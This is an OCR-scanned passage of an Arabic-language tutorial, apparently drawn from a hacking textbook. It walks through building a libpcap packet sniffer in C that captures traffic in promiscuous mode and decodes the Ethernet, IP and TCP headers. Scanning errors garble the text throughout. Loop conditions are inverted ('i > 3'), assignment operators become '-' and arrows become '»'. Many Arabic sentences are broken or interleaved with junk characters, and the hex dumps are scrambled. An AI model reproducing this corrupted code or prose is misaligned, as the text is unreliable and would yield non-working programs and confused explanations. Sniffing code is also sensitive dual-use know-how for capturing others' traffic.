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هذه ال Library‏ بها العديد من ال functions‏ وال structures‏ لتقوم Je‏ ما Ne‏ 
نبدأ بال ) :main(‏ 

قمنا باستدعاء struct‏ من هذه ال lib‏ وهو .pcap. pkthdr‏ 

اشتققنا منه object‏ وأسميناه ..header‏ 


هذا ال object‏ سيحمل نفس ال iadi variables‏ تحت هذا ال (S struct‏ تعلم. 


هاهى: 
struct pcap pkthdr 1‏ 
struct timeval ts; /* time stamp */‏ 
bpf u int32 caplen; /* length of portion present */‏ 
bpf u int32 len; /* length this packet (off wire) */‏ 


= آول متغير پستخدم لعرض الوقت الذي حدث فيه ال capturing‏ 
" والثاني سیعرض لك حجم ال c data‏ لك التقاطها خلال عملية ال .capture‏ 
= والثالث سیعرض لك حجم ال idea! Packets‏ التي يتم التقاطها!. 


ثم قمنا بتعريف ell‏ الذي سَنضع به ال row bytes‏ بصيغة unsigned char‏ كما أوضحنا gus dta‏ بعده متغير 
باسم errbuf‏ له حجم ثابت وهو bytes‏ 256( سنستخدم هذا ا منغير لنضع به مسار ال device‏ الذي سیقوم بعملية 


ال «sniffing‏ وهو 3( La lL‏ سیکون /dev/ethO‏ ونعنی ا 610670610 إشارةً إلى کارت الشبكة لدینا. 
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م ناق لهذا الجزء: 
device = pcap lookupdev (errbuf);‏ 
(device == NULL)‏ ۶ 1 
pcap fatal("pcap lookupdev", errbuf);‏ 


printf ("Sniffing on device %s\n", device); 


استخدمنا ( pcap. lookupdev(‏ لتقوم بالتحقق من كارت الشبكة لديك: 
"Find the default device on which to capture"‏ 
وان Xs‏ ذلك» fics‏ جع error LÍ‏ عن طريق ( fatal(‏ التى استخمناها مراراً من قَبّل. 


ما و 


م هذا الجزء: 
pcap handle - pcap open live(device, 4096, 1, 0, errbuf);‏ 
if(pcap handle -- NULL)‏ 
pcap fatal("pcap open live", errbuf);‏ 


KS. libpcap library وهي من ال‎ pcap open live( ) استخدمنا هنا‎ 
: تلاحظ‎ C$ arguments جموعة من ال‎ peace 

* الأول هو مسار ال device‏ نفسه /dev/eth0‏ 

maximum packet size والثاني هو ال‎ * 

promiscuous mode flag والثالث هو‎ * 

" والرابع هو ال timeout value‏ 


* والخامس هو pointer‏ يشير إلى ال errbuf‏ 
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e‏ الأخير: 
for(i=0; i > 3; i++) {‏ 
packet = pcap next(pcap handle, &header);‏ 
printf ("Got a 50 byte packet Mn", header.len);‏ 
dump (packet, header.len);‏ 
} 


كالعادة نقوم loop jor‏ لاستقبال ال «packets‏ وحددنا عددهم ليكون BIG‏ 
هذه ال ) peap. next(‏ تستقبل arguments‏ عبارة عن ال handle‏ القادم من ال ( Pcap. open live(‏ والآخر هو ال 


"address of our object"‏ الذي اشتققناه من ال «pcap. pkthdr‏ الذي يحوي بيانات ال length of packets‏ و ال 


.time of capturing 


- 
A n 


“Return the next available packet" : 5 V5 function تعتعر وظيفة هذه ال‎ 


i 


م 3b‏ وظيفة ال ( «dump(‏ وتستقبل ‘two arguments‏ 
SP.‏ هو ال «packet‏ وهو عبارة عن unsigned char‏ لیحمل بداخله ال row bytes‏ 
* والثانی هو أحد ال attributes‏ أو ال elements‏ الخاص L615) «header JL‏ عنه à‏ أول جزء). 


هذا dus y co‏ من هذا ال struct‏ سوى هذا ال hell variable‏ بال length‏ 


20-2 pA 
لإنباء العملية:‎ close pcap() نستخدم‎ Lil ثم‎ 
pcap close() - close a capture device or save file 


هيا لنقوم بتشغبل هذا الكود: 
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reader@hacking:~/booksrc $ gcc -o pcap sniff pcap sniff.c -l pcap 
reader@hacking:~/booksre $ ./pcap sniff 


Fatal Error in pcap lookupdev: no suitable device found 
reader(hacking:-/booksrc $ sudo ./pcap sniff 

Sniffing on device eth0 
Got a 82 byte packet 


00 01 6c eb 1d 50 
00 44 le 39 40 00 
2a £9 8b 12 le 2 
05 b4 54 1a 00 00 
37 le 74 68 69 73 
Od 0a 


00 
40 
ac 
01 
20 


Got a 66 byte packet 


00 01 29 15 65 6 
00 34 3d 2c 40 00 
2a 01 le d2 8b 12 
230 0x400 

05 a8 2b 3۴ 00 00 
a7 76 


00 
40 
e5 


01 


Got a 84 byte packet 


00 01 6c eb 1d 50 
00 46 1e 3a 40 00 
2a £9 8b 12 le 2 
05 b4 11 b3 00 00 
27 6c 41 41 41 41 
41 41 Od Oa 


00 
40 
ac 
01 
41 


01 
06 
14 
01 
69 


01 
06 
10 


01 


01 
06 
14 
01 
41 


29 
46 
cf 
08 
73 


6c 
27 
6c 


08 


29 
46 
cf 
08 
41 


reader@hacking:~/booksre $ 
reader@hacking:~/booksre $ 


15 
20 
c7 
0a 
20 


eb 
4d 
c9 


0a 


15 
1d 
d7 
0a 
41 


65 b6 08 00 45 10 iei pou S) ete PIS 
c0 a8 2a 01 c0 a8 Di OO (E tss 
e5 10 6c c9 80 18 ی وا‎ Be aides we e Tis 
26 b6 a7 76 02 3c Saule goes كم‎ &..V.« 
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لاحظ ظهور ال error‏ في البداية بسبب عدم استخدام sudo command‏ 


ينجاح.. 
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pes‏ الآن إلى آمُور آکثر اثارة.. 

..OSI Layers لل‎ Analysis سنقوم بعمل‎ 

آجدك Ob‏ تفهم ال Gor: OSI Layers‏ مع انتهاء الفقرة القادمة. 
هيا بنا.. 


Layer Analysis 


هذا ال JUI traffic‏ عبر الشبكة عبارة عن packets‏ تحتوي على data‏ و headers‏ يوضح التفاصيل المتعلقة بتلك ال 
.data‏ سنقوم الآن بعمل ما sais‏ بال “Decoding the Layers”‏ 
سنبدأ بالمرور على الطبقات الثلاث» «(Data-Link, Network, and Transport Layers)‏ نقوم خلاطا بتفكيك 


وتحليل محتويات ال Header‏ الخاص بكل طبقة» وتجهيزهم كي يتم استخدامهم ed‏ بعد.. 


.Ethernet Header بال‎ Tas 


Ethernet Header 
عبر هذا المسار:‎ Ethernet Header JL الخاص‎ structure تم تعريف ال‎ Linux نظام التشغيل‎ à 


/user/include/linux/if ether.h 


سأعرض لك screenshot‏ من جهازي» وهي توضح جزء من هذا الملف: 
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root@kali: ~ 


File Edit View Search Terminal Help 


"* Web Penetration ui 


Testing with i 
naX" Second Editi... #ifndef LINUX IF ETHER H 


#define LINUX IF ETHER H 


«include <linux/types.h> 


IEEE 802.3 Ethernet magic constants. The frame sizes omit the 
and FCS/CRC (frame check sequence). 
IM #define ETH ALEN 6 /* Octets in one ethernet addr 
define ETH HLEN 14 /* Total octets in header. 
#06 ۲1۳۵ ETH ZLEN 60 /* Min. octets in frame sans 
#define ETH DATA LEN 1500 /* Max. octets in payload 
ETH FRAME LEN 1514 /* Max. octets in frame sans H 
ETH FCS LEN 4 /* Octets in the FCS 


Penetration Tes ng, 


| Genuae Sis. These are the defined Ethernet Protocol ID's. 


#define ETH P LOOP 3 /* Ethernet Loopback packet 


a I 


"^ 47 
we 


آول Define‏ هي اختصار "Ethernet Address Length" J‏ تعني أنه تخصیص bytes‏ 6 من أجل ال MAC‏ 
Address‏ لاحظ في السطر الذي يبدأب: 
#define ETH HLEN 14‏ 


إنه يقوم بتعريف طول ال Ethernet Header‏ ليكون Bytes‏ 14 
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(asl‏ ال field‏ الخاص al 53 data length JL‏ لا يَتَجاوّز ال bytes‏ ۰1500 وهذا هو ال MTU‏ الذي تكلمنا عنه في 
الفصل السابق. لاحظ في السطر الذي يليه أنهُ &G‏ بإضافة ال bytes‏ 14 على ال 1500 ليُعطينا المحصلة وهي ال 


Header مُضافاً إليها ال‎ Data الذي هو عباره عن ال‎ "Frame" 


هاهو: 
#define ETH ALEN 6 /* Octets in one ethernet addr */‏ 
#define ETH HLEN 14 /* Total octets in header */‏ 
*/ 
This is an Ethernet frame header.‏ 5 
7 
struct ethhdr 4‏ 
unsigned char h dest[ETH ALEN]; /* Destination eth addr */‏ 
unsigned char h source[ETH ALEN]; /* Source ether addr */‏ 
bel6 h proto; /* Packet type ID field */‏ _ 
attribute ((packed));‏ } 
E PC‏ 
والان هیا نحو صل ما مضى: 


6 bytes Source MAC + 6 bytes Dest MAC + 2 bytes type of ethernet packet — 
14 bytes (Ethernet Header) 


هل تتذكر هذا ال "type of ethernet packet"‏ ؟ 

تحدثنا عنه في فقرة بروتوكول ال ARP‏ الباب الثاني» عندما LS‏ بحاجة ّعرفة نوع ال packet‏ ما إذا كانت ARP‏ آم 
8 عادية. سَنقوم بعمل ال structure‏ الخاص بنا Fy‏ على هذه المعلومات القيّمة» مع تغيير بعض التسميات غير 
الواضحة إلى ما ترا أوضح ثم نَضعهُم في include file‏ على حدة. 
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#define 


ETHE 


#define 


RA 
R H 


D 


DR L 


ETHE 


D 


EN 6 


R LEN 14 


struct ether hdr { 
unsigned char ether dest addr[ETHER ADDR LEN]; //Dest. MAC 
unsigned char ether src addr[ETHER ADDR LEN]; // Source MAC 
unsigned short ether type; // Type of Ethernet packet 


); 


IP Header 


Bit 0 


Version (4) 


Header 
Length (4) 


Priority & Type 
of Service (8) Total Length (16) 
Tm Flags 
Identification (16) (3) Fragment Offset (13) 
Time To Live (8) Protocol (8) Header Checksum (16) 
Source IP Address (32) 
Destination IP Address (32) 
IP Options (0 Or 32 If Any) 
Data (Varies If Any) 


“Network.h” Call على هذا‎ glans 


والآن سننتقل إلى ال structure‏ الخاص بال IP Header‏ 


Bit 15 Bit 16 Bit 31 


Bytes 


Options field بدون ال‎ 20 bytes طوله‎ gu IP Header لاحظ أن ال‎ 
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وكا فعلنا مع ال Ethernet Header‏ سنفعل هنا نفس الشيء. 


هذا الشكل یوضح مسار هذا ال ‘Header‏ 


root@kali: ~ 


File Edit View Search Terminal Help 


EP Web Pe :-# ls /usr/include/netinet 
Testingether.h if ether.h if tr.h in.h ip6.h ip icmp.h udp.h 


“naxoectcmp6.h 10 igmp.h in systm.h ip.h tcp.h 
:~# cat /usr/include/netinet/ip.h 


مايل بعض محتويات هذا ال ‘Struct‏ 


struct iphdr 
{ 
#if _ BYTE ORDER == LITTLE ENDIAN 
unsigned int ihl:4; 
unsigned int version:4; 
#elif _ BYTE ORDER == _ BIG ENDIAN 
unsigned int version: 4; 
unsigned int ihl:4; 
#else 

# error "Please fix <bits/endian.h>" 
#endif 

u_int8 t tos; 

ü intl6 t tot len; 

ü intl6 t id; 

u intl6 t frag off; 

u int8 t ttl; 
u int8 t protocol; 
ü intl6 t check; 

u int32 t saddr; 

u int32 t daddr; 
/*The options start here. */ 


); 


a 
t 
t 
E 
E 
6 
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سنقوم بإنشاء هذا ال Laf Header‏ و 42.3 J]‏ ال include file‏ ذاته.. 


الذى آسمیناه: ۷۵0/01۳ 


struct ip hdr 1 

nsigned char ip version and header length; // Ver and hdr len 
nsigned char ip tos; // Type of service 

nsigned short ip len; // Total length 

nsigned short ip id; // Identification number 

nsigned short ip frag offset; // Fragment offset and flags 
hsigned. char ip ttl; // Time to live 

nsigned char ip type; // Protocol type 

nsigned short ip checksum; // Checksum 

signed int Ip-sro- addr; // Source IP address 

nsigned int ip dest addr; // Destination IP address 


E ad 


en‏ یب نب نب نب نب نب نک نک با 


.TCP Header ونختم بال‎ 


TCP Header 


„options field بدون ال‎ « 20 bytes يبلغ طوله‎ Header هذا ال‎ qe» 


تعرض في الصفحة التالية شكل هذا ال ‘Header‏ 
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Bit 0 Bit 15 Bit 16 Bit 31 


Source Port (16) Destination Port (16) 
Sequence Number (32) 
20 
Acknowledgment Number (32) Bytes 
Heade 
engin á )| Reserved (6 )| Code Bits(6 Window (16) 


Checksum (16) Urgent (16) 
Options (0 or 32 If Any) 
Data (Varies) 


GS “TCP header length" JI بعض المصادر تقوم بتعريف‎ 


"An integer that specifies the length of the segment header measured in 32-bit multiples " 
“4 bytes * number of segments have been used” صَد بذلك:‎ A و‎ 


مايل شكل ال Structure‏ الخاص به: 


typedef u int32 t tcp seq; 


/* 
* TCP header. 
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* Per RFC 793, September, 1981. 
*y 
struct tcphdr 
{ 
u int16 t th sport; /* source port */ 
u int16 t th dport; /* destination port */ 
tcp seq th seq; /* sequence number */ 
tcp seq th ack; /* acknowledgment number */ 
# if _ BYTE ORDER == LITTLE ENDIAN 
u int8 t th x2:4; /* (unused) */ 
u int8 t th off:4; /* data offset */ 
# endif 
# if _ BYTE ORDER == BIG ENDIAN 
u int8 t th off:4; /* data offset */ 
تا‎ int8 t th x2:4; /* (unused) */ 
# endif 
تا‎ int8 t th flags; 


Se SE H H H d 
Q; 
0 
Fh 
H 
3 
0 


TH FIN 1 

TH SYN 0x02 

TH RST 0x04 

TH PUSH 0x08 

TH ACK 0 

TH URG 0x20 

16 t th win; /* window */ 


16 t th sum; /* checksum */ 


16 t th urp; /* urgent pointer */ 


سنقوم Lal‏ بكتابة ال TCP Structure‏ بطريقتنا. . 


لاحظ LÍ‏ سنقوم بعمل define‏ لل Flags‏ مرة أخرى بطريقة أوضح. 


struct tcp hdr 1 


unsigned 
unsigned 
unsigned 


short top src port; // Source TCP port 
short top dest port; // Destination TCP port 
int tcp seq; // TCP sequence number 
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unsigned int tcp ack; // TCP acknowledgment number 

unsigned char reserved:4; // 4 bits from the 6 bits of reserved space 
unsigned char top offset:4; // TCP data offset for little-endian host 
unsigned char tcp flags; // TCP flags (and 2 bits from reserved space) 


#define TCP FIN 0x0! 
#define TCP SYN 0x02 
#define TCP RST 0x04 
#define TCP PUSH 0x08 
#define TCP ACK 0x10 
#define TCP URG 0 


unsigned short tcp window; // TCP window size 
unsigned short tcp checksum; // TCP checksum 
unsigned short tcp urgent; // TCP urgent pointer 
E 


نقوم بضوهم Call‏ إلى اللف "Network."‏ 

هذا عمل رائع!. 

لقد قمنا بتعريف ال Headers‏ على هيئة Structures‏ والآن يُمكئنا كتابة برنامج ليقوم بعمل eid decode‏ ال 
5 من کل packet‏ يتم التقاطها. 

سَیکون ذلك Mask‏ 


The Decoder Sniffer 


سنقوم هنا بالاستعانة بال <"libpcap library"‏ والملف الذي أنشأناه “Network.h”‏ من أجل تكوين Sniffer‏ يقوم 


بعمل capture‏ لل traffic‏ المار عبركارت الشبكة و عرض تفاصيل كل packet‏ مع عمل decode‏ لکل pee layer‏ 


. Transport Layer JL وانتهاء‎ Data-Link Layer JL 
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سنطرح هذا الكود على ثلاثة أجزاء كي تُسَهّل على أنفسنا عملية الإستيعاب. لاحظ Ul‏ سوف نستبدل ال function‏ 
التي استخدمناها في ال sniffer‏ السابق والتي كانت بإسم ) ..pcap_next(‏ هل نسيت وظيفتها؟ ..كانت وظيفتها 
تتمثل في ele‏ ال packet‏ التالية. 

سنستخدم لذلك function‏ أخرى أفضل منهاء هي ) )م0ه1_مهعم» وتعد أكثر فاعلية منها. 


مايل ال prototype‏ الخاص ما: 


int pcap loop(pcap t *handle, int count, pcap handler caught packet, 
u char *args); 


ماهذه ال Arguments‏ ال عجة!!. Y..‏ تقلق.. سيكون کل شيء على مايرام. 
لنبداً پذا ال ‘Handle‏ 
$ £ 2 
دعنى أعطيك تعريف ال Handle‏ من وجهة نظر أنظمة التشغيل لتفهمه جيدا.. 
يعرف UJ‏ السيد Michael Sikorski‏ ال |S Handles‏ یی : 
Handles are items that have been opened or created in the OS, such as a window, process,‏ 
module, menu, file, and so on. Handles are like pointers in that they refer to an object or memory‏ 
location somewhere else. However, unlike pointers, handles cannot be used in arithmetic‏ 
operations, and they do not always represent the object's address.‏ 
The only thing you can do with a handle is store it and use it in a later function call to refer to‏ 
the same object.‏ 


كيف سنستخدم فكرة هذا ال handle‏ هنا في هذه ال ) *.pcap loop(‏ 
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Wim‏ سیکون هذا ال storage 4) handle‏ لنضع فيه ال return value‏ القادمة من ال function‏ المسؤولة عن فتح 
كارت الشبكة لدينا في وضعية ال «promiscuous mode‏ 4 تستخدمة لاحقاً function J Argument JÛ‏ آخر ub‏ 
هي ال peap_loop()‏ هذا بالضبط ما يشير إليه الجزء ال Bold‏ من تعریف ال handle‏ فوق. آلیس كذلك؟. 

وبالنسبة لل Argument‏ الثانیق فهو رقم jas int‏ عن sue‏ ال packets‏ التي سنلتقطها» والتي وضعناها في Juil‏ 


السابق ب )3(« لاحظ أنه لو تم وضعها ب "1-" فنعني بذلك loop‏ إلى أن يتم غلق ال Sniffer‏ 


بخصوص ال Argument‏ الثالثه فهو عبارة عن function J pointer‏ آخری.. 
يبدو أن ال ) pcap. loop(‏ ستقوم هنا بعمل call‏ ل P function‏ ئ caught_packet( ) OP‏ لتقو e‏ باعطائنا 
معلومات مُفصّلة عن هذه ال packet‏ التى قامت بالتقاطها ال ( .pcap. loop(‏ فهى تحوي تفاصيل ال packet‏ الحالية 


Arguments pinsa «U capture js e T‏ عبارة عن «pointers‏ هذه ال 5 تقوم بالإشارة إلى ال 


.packet itself وال‎ packet header 


ها هو شكل ال ) caught. packet(‏ : 


void caught packet(u char *args, const struct pcap pkthdr 
*cap header, const u char *packet); 


ال Argument‏ الثانية هي object‏ تم اشتقاقه من ال struct pcap_pkthdr‏ وهو struct‏ موجود في ال libpcap lib‏ 


والأخير هو pointer‏ سنتحرك به داخل ال packet‏ ا ملتقطة ليقوم بخدمتنا في عملية ال .Decoding‏ 
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كانت iaid oda‏ خفيفة لتهيئتك لاستقبال هذا الكود الغنى cote Ulo‏ © 
سنقوم بتقسيم الكود على BE‏ أجزاء كا E53‏ لك في البداية. 


ما يلي أول جزء منه 


#include <pcap.h> 

#include "error.h" 

#include "network.h" 

void pcap fatal(const char *, const char *); 
void decode ethernet(const u char *); 

void decode ip(const u char *); 

u int decode tcp(const u char *); 


void caught packet(u char *, const struct pcap pkthdr *, const 
u char *); 
int main() 4 
struct pcap pkthdr cap header; 
const u char *packet, *pkt data; 
char errbuf[PCAP ERRBUF SIZE]; 
char *device; 
pcap t *pcap handle; 


device = pcap lookupdev (errbuf); 
if(device == NULL) 
pcap fatal("pcap lookupdev", errbuf); 


printf("Sniffing on device %s\n", device); 


pcap handle - pcap open live(device, 4096, 1, 0, errbuf); 

if(pcap handle -- NULL) 
pcap fatal("pcap open live", errbuf); 

pcap loop(pcap handle, 3, caught packet, NULL); 


pcap close(pcap handle); 


يظهر في البداية بعض ال function prototypes‏ .. 
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.$ prototype تعريف ال‎ ou J^ 
ا ملتقطة. لاحظ أن الأخبرة» الخاصة بال‎ packets لل‎ decode تم تعريفهم ليقوموا بوظيفة ال‎ functions يوجد ثلاثة‎ 


TCP Header‏ ليست من نوع ۰۷010 بل ستقوم بإرجاع قیمف UJ eo‏ هذه ال function‏ قيمة هى: 
.TCP Header Length‏ 


ولكن لماذا نحسب ححجمة بأي حال؟ 
نحن بحاجة لحساب حجمة كي يتسنى لنا في النهاية معرفة حجم ال data‏ داخل ال packet‏ وذلك بعد طرح ال 
Header Length‏ الخاص بكل Layer‏ فيتبقى CJ‏ حجم ال data‏ الفعلى. 


ثم يبدأ البرنامج بال ) main(‏ 


struct pcap pkthdr cap header; 
const u char *packet, *pkt data; 
char errbuf[PCAP ERRBUF SIZE]; 
char *device; 

pcap t *pcap handle; 


يظهر في البداية اشتقاق object‏ من ال .pcap. pkthdr ENT Struct‏ 


هل تتذكر هذا ال Struct‏ ؟. 


لقد استخدمناه في ال Sniffer‏ السابق » حيث استخدمنا منه ال element‏ الأخير ليعرض لنا مايلي: 
"Length of Captured Packet"‏ 


هذا هو شكله: 
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struct pcap pkthdr 1 


struct timeval ts; /* time stamp */ 
bpf u int32 caplen; /* length of portion present */ 
bpf u int32 len; /* length this packet(off wire) */ 


.pkt. data و‎ packet هم‎ unsigned char من نوع‎ pointers بتعريف‎ tss = 

سنستخدم ال pointer‏ الأول في عملية sy zs‏ داخل ال memory block‏ الخاصة Headers JL‏ هل تتذكر درس ال 
UI (3 pointers‏ الأول؟ 

لقد تحدثنا عن هذا الأمر بمثال "Hello world!"‏ . 

وال pointer‏ الثاني سنستخدمه Argument A‏ لل ) Dump(‏ ليعبر LJ‏ عن ال row bytes‏ الملتقطة. ثم نلتقي بضيفنا 
العزيز ال Handle‏ الذي تكلمنا عنه منذ قليل «"Pcap, handle"‏ لابد وأنك تعي وظيفتة he‏ ثم نقوم بتجهيز ال 
device‏ لعملية sniff JI‏ باستخدام ال ( dookup_dev(‏ لتبدأ بعدها عملية ال Looping‏ لاستقبال ال packets‏ 


واجراء عملية Decoding Jl‏ لاستخراج التفاصيل. 


کےا تلاحظ أن ال ) pcap. loop‏ ستقوم call jor‏ لل «caught_packet()‏ هذه الأخيرة سیتم استدعاژها مع کل 


packet‏ تقوم ال pcap. loop‏ بالتقاطها. 


إلى هنا ينتهي الجزء الأول. 


سننتقل إلى الجزء «GUI‏ والتمثل في وظيفة caught. packet( ) Jl‏ فهي تقوم بدور محوري في هذا الكود. 
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*cap header, 


void caught packet(u char *user args, 
const u char 
*packet) 1 


const struct pcap pkthdr 


int tcp header length, total header size, pkt data len; 
u char *pkt data; 


printf ("==== Got a $d byte packet 


====\n", cap header-»len); 


decod 


| ethernet (pac 
decode ip(packet + ETHER HDR LEN); 
tcp header length - 


ket); 


decode tcp (packet + 


ETHER HDR LEN + sizeof(struct ip hdr)); 


total header size - 


ETHER HDR LE 


N * sizeof(struct ip hdr) 


* tcp header length; 


/*pkt data points to the dataportion*/ 
pkt data = (u_char *)packet + total header size; 
pkt data len cap header-»len total header size; 
if(pkt data len » 0) 1 
printf("NtNtNt$u bytes of 
dump(pkt data, pkt data J 


) else 


packet data\n", pkt data len); 
len); 


printf ("\t\t\tNo Packet Data Wn") 

} 

void pcap fatal(const char *failed in, 
printf("Fatal 1 


E const char *errbuf) { 
Error in $5: %s\n", failed in, errbut); 
exit(1); 

} 
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يظهر لنا في بداية الكود ال ) «caught. packet(‏ يتبعها مجموعة من ال Integer variables‏ يبدو Local ee‏ 
«variables‏ بمعنى أننا سنستخدمهم داخل هذه ال function‏ فقط. 

وللتذكير.. i‏ من هذه ال function‏ أن تفصل ال 5 عن بعضهم» " تفصل ال Lal data‏ عنهم. لتعرض 
CJ‏ هذه ال data‏ عن طريق استدعاء ال Dump()‏ 


هيا Sd‏ على بقية الأسطر: 


printf ("==== Got a td byte packet ====\n", cap _header->len) ۶ 


سنستخدم ال ) printf(‏ هنا لتطبع UJ‏ على الشاشة «Length of packet‏ لاحظ أن هذا ال length‏ يمثل حجم Jl‏ 


data + Headers‏ إذا نسیت دلالة هذه الاشارة "<-" يمكنك مراجعة درس ال Structs‏ في الباب الأول. 


ثم ناق مذه الجموعه التی تبداً ہذہ ال ‘Function‏ 
decode ethernet (packet);‏ 


يتم تنفيذ هذه ال function‏ داخل ال ) caught. packet(‏ 

فهي Argument x‏ عباره عن Pointer‏ لتقف به على موضع ال Ethernet Header‏ داخل ال LEM Packet‏ 
لتقوم بعمل ال Decoding‏ هذا ال Header‏ (ستشاهد هذا ال Header‏ بالتفصيل في الجزء الثالث من الكود). ولكن 
دعني أوضح لك كيف تتم عملية الإنتقال dos packet NU Pointer JU‏ داخل ال xb E Packet‏ کا [ON‏ 
أنا!.. 


سأذهب إلى برنامج ال paint‏ وأعود إليك بعد قليل.. 
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Packet اس‎ 
Ethernet Hdr 
Packet + Ether Hdr اس‎ 
IP Header 
Packet + Ether Hdr ^ » 
IP Header 
TCP Header 
Packet + Ether Hdr + » 
IP Header + TCP Hdr 
Data 


عدنا! 


Bye بدایتها. هاهی‎ (à Pointer فتضع ال‎ Packet تحتاج لأن تقف في بداية ال‎ decode ethernet( ) ترى أن ال‎ |S 


£ 


اخرى: 


decode ethernet (packet); 


decode ip (packet-* 


decode ip( ) ال‎ go 


ETH 


ER HDR LI 


EN) ; 


ستقوم هذه بتحريك ال Pointer‏ ليكون عند بداية ال IP Header‏ وبالتالي يكون ال Argument‏ كما ترى فوق. 
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..TCP Header لل‎ decode يد عمل‎ 5 mt وهذه‎ 


فستقوم بتحريك ال Pointer‏ إلى بداية ال Address of TCP Header‏ 


tcp header length - 
decode tcp (packet + ETHER HDR LEN + sizeof (struct ip hdr)); 


لاحظ أن هذه ال function‏ بالذات سترجع لنا قيمة بصيغة int‏ بإسم: tcp. header length‏ بعكس الباقين. 


والآن نريد معرفة ال Length of data‏ بمفردها كي يتسنى UJ‏ طباعتها باستخدام ال ( «Dump(‏ الأسطر التالية 
ستوضح لنا هذه العملية: 


total header size < 
ETHER HDR LEN + sizeof(struct ip hdr) + tcp header length; 


يتم حساب ا حجم الكلى لل Header‏ ; ووضعه 3( Local Variable‏ الذي e‏ تعريفه داخل ال ) Caught. packet(‏ .. 


„JSI packet JI من حجم‎ i= hó تم‎ 


/*pkt data points to the data portion.*/ 
pkt data = (u_char *)packet + total header size; 


نقوم Us‏ بتجهيز ال pkt. data uli pointer‏ ليُشير إلى بداية ال data‏ بداخل ال packet‏ الق وبالطبع سيكون 


من نوع unsigned char‏ كي تستطيع ال ) Dump(‏ التعامل معه. 


pkt data len = cap header-»len total header size; 
..! فقط‎ "length of data" سيحمل بداخله ال‎ local variable هذا ال‎ 
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وذلك بعد طر £ ال "length of total header"‏ من ال ."length of packet"‏ وسیکون ال Argument‏ الثانية لل 


de |S Dump() 


if(pkt data len » 0) 1 
printf ("\t\t\t%u bytes of packet data\n", pkt data. lem); 
dump(pkt data, pkt data len); 

) else 
printf ("\t\t\tNo Packet Data\n"); 


إلى هنا نکون انتهينا من توضيح الجزء الثاني من هذا ال „Sniffer‏ 


والآن جاء دور احزء الثالث من الكود: 
سَيُوضح LÍ‏ الاجراءات التفصيلية التي تقوم بها الثلاث functions‏ التالية: 


void decode ethernet (const u_char (۶ 
void decode ip(const u char *); 
u int decode tcp(const u char *); 


لنلق نظرة على بقية الكود: 


void decode ethernet(const u_char *header start) { 


"nut: iy 

const struct ether hdr *ethernet header; 

thernet header - (const struct ether hdr *)header start; 
printf("[[ Layer 2 :: Ethernet Header ]]\n"); 
printf("[ Source: $02x", ethernet header-»ether src addr[0]); 
for(i-1; i < ETHER ADDR LEN; i++) 


printf(":$02x", ethernet header-»ether src addr[il); 


printf("NtDest: $02x", ethernet header-»ether dest addr[0]); 
for(i-1; i < ETHER ADDR LEN; i++) 
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printf(":$02x", ethernet header-»ether dest addr[i]); 
printf("NtType: shu ]\n", ethernet header-»ether type); 


) 


void decode ip(const u_char *header start) { 
const struct ip hdr *ip header; 


ip header - (const struct ip hdr *)header start; 

printf("Nt(( Layer 3 ::: IP Header ))\n"); 

printf ("\t( Source: %s\t", inet ntoa Gp. header->ip Src addtr)); 
printf("Dest: $s )\n", inet ntoa(ip header->ip dest addr)); 
printf ("\t( Type: %u\t", (aint) ip header->ip type); 

printf ("ID: Shu\tLength: shu )\n", ntohs(ip header->ip id), 


ntohs (ip header->ip_len)); 
} 


u int decode tcp(const u char *header start) { 
u int header size; 
const struct tcp hdr *tcp header; 


tcp header = (const struct tcp hdr *)header start; 
header size = 4 * tcp header-»^tcp offset; 


printf("NtNt(( Layer 4 :::: TCP Header }}\n"); 
printf("NtNt( Src Port: Shu\t", 
ntohs (tcp header-»5tcp src port)); 
printf("Dest Port: Shu }\n", ntohs (tcp header-»5tcp dest port)); 
printf("NtNt( Seq 4: Zu\t", ntohl(tcp header->tcp_seq)); 
printf ("Ack 4$: ناه‎ }\n", ntohl(tcp header-»tcp ack)); 
printf ("\t\t{ Header Size: su\eFlags: ", header size); 
if(tcp header-»tcp flags & TCP FIN) 


printf("FIN "); 
if(tcp header-»tcp flags & TCP SYN) 
printf("SYN "); 
if(tcp header-»tcp flags & TCP RST) 
printf("RST "); 
if(tcp header-»tcp flags & TCP PUSH) 
printf("PUSH "); 
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€ 


if(tcp header-»tcp flags & TCP ACK) 
printf("ACK "); 

if(tcp header-»tcp flags & TCP_URG) 
printf("URG "); 

printf(" }\n"); 


return header size; 


decode. ethernet( ) وهی ال‎ «function بشرح أول‎ nw 


void decode ethernet (const u_char *header start) { 
Ine 6 


Ethernet حيث ال‎ packet إلى بداية ال‎ p pointer وهو‎ «Argument لک‎ Packet ال‎ function هذه ال‎ iet 
function ال‎ eid local وهو‎ (i) 4x3 عَرَّفنا‎ E .header 


const struct ether hdr *ethernet header; 


struct التی بداخل هذا ال‎ Elements نفس ال‎ LU struct ether hdr من هذا ال‎ object اشتققنا‎ a 
؟‎ Struct هل تذكر هذا ال‎ 


22 
سأذكرّك به: 


#define ETHER ADDR LEN 6 
*define ETHER HDR LEN 14 
struct ether hdr { 
unsigned char ether dest addr[ETHER ADDR LEN]; //Dest. MAC 
unsigned char ether src addr[ETHER ADDR LEN]; // Source MAC 


unsigned short ether type; // Type of Ethernet packet 


); 
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لنكمل الكود.. 


thernet header = (const struct ether hdr *)header start; 
داخل ال‎ Ethernet header التى بداخله بالبيانات الموجودة 3( ال‎ elements يملاً ال‎ Ob هذا‎ object بكر هنا ال‎ 


packet‏ التى تم التقاطها. 


printf("[[ Layer 2 :: Ethernet Header ]]\n"); 


printf("[ Source: $02x", ethernet header-»ether src addr[0]); 
for(i-1; I > ETHER ADDR LEN; 1++( 
printf (“:%02x", ethernet header-»ether src addr[i]); 


تقوم هنا ال ( printf(‏ بطباعة ال "Source MAC Address"‏ . 


wes 


فقد أشرنا إلى ال element‏ الذي يعبر عنه داخل ال «struct‏ تتم كتابة MAC JI‏ عن طريق عمل loop‏ تبدأ byte J sb‏ 


وتنتهي بال byte‏ رقم 6 وهو الأخير. 


printf("NtDest: 5022", ethernet header-»ether dest addr[0]); 
for(i-1; i > ETHER ADDR LEN; i++) 

printf (":%s02x", ethernet header-»ether dest addr[i]) 
printf ("\tType: $hu ]\n", ethernet header=>ether type) 
} 


7 
7 


نكرر نفس الأمر هُنا Laf‏ لنقوم بطباعة ال "Destination MAC Address"‏ 
ثم آخر سطر سيقوم بطباعة "Type of packet"‏ وهو ال element‏ الأخير داخل ال Struct‏ 
سنتكلم W‏ عن هذا ال „field‏ 
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الشكل التالي يوضح ال Frame‏ في ال di «Data-Link Layer‏ التركيز على ال ee ‘MAC Header‏ ال 
Ether Type‏ 


